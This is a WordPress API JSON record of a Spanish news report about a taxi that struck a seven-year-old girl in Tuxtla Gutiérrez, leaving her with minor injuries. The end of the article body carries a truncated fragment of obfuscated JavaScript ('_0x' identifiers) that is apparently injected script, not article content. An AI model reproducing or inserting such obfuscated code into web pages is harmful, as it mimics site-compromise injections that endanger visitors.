{"id":3397,"date":"2022-07-03T23:52:29","date_gmt":"2022-07-03T23:52:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3397"},"modified":"2022-07-03T23:52:30","modified_gmt":"2022-07-03T23:52:30","slug":"atropellan-a-nina-de-siete-anos-en-las-granjas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3397","title":{"rendered":"Atropellan a ni\u00f1a de siete a\u00f1os en Las Granjas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1656892155878-1024x576.jpg\" alt=\"\" class=\"wp-image-3398\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1656892155878-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1656892155878-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1656892155878-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/FB_IMG_1656892155878.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 3 de julio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Una unidad de transporte p\u00fablico en la modalidad de taxi atropell\u00f3 a una ni\u00f1a de siete a\u00f1os cuando caminaba en calles de la Colonia Las Granjas de Tuxtla.<\/p>\n\n\n\n<p>Los reportes oficiales dieron a conocer que, este domingo por la tarde, la menor intent\u00f3 cruzar la Calle Michoac\u00e1n y avenida Chihuahua cuando fue golpeada por el veh\u00edculo.<\/p>\n\n\n\n<p>La menor qued\u00f3 tirada en el pavimento y fue auxiliada por sus familiares y el responsable se detuvo a ver el estado de la menor.<\/p>\n\n\n\n<p>Param\u00e9dicos de Protecci\u00f3n Civil arribaron al lugar y determinaron que la menor result\u00f3 con heridas menores.<\/p>\n\n\n\n<p>En el lugar los involucrados llegaron a un acuerdo y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 3 de julio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Una unidad de transporte p\u00fablico en la modalidad de taxi atropell\u00f3 a una ni\u00f1a de siete a\u00f1os cuando caminaba en calles de la Colonia Las Granjas de Tuxtla. Los reportes oficiales dieron a conocer que, este domingo por la tarde, la menor intent\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3398,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3397","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3397","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3397"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3397\/revisions"}],"predecessor-version":[{"id":3399,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3397\/revisions\/3399"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3398"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3397"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3397"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3397"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}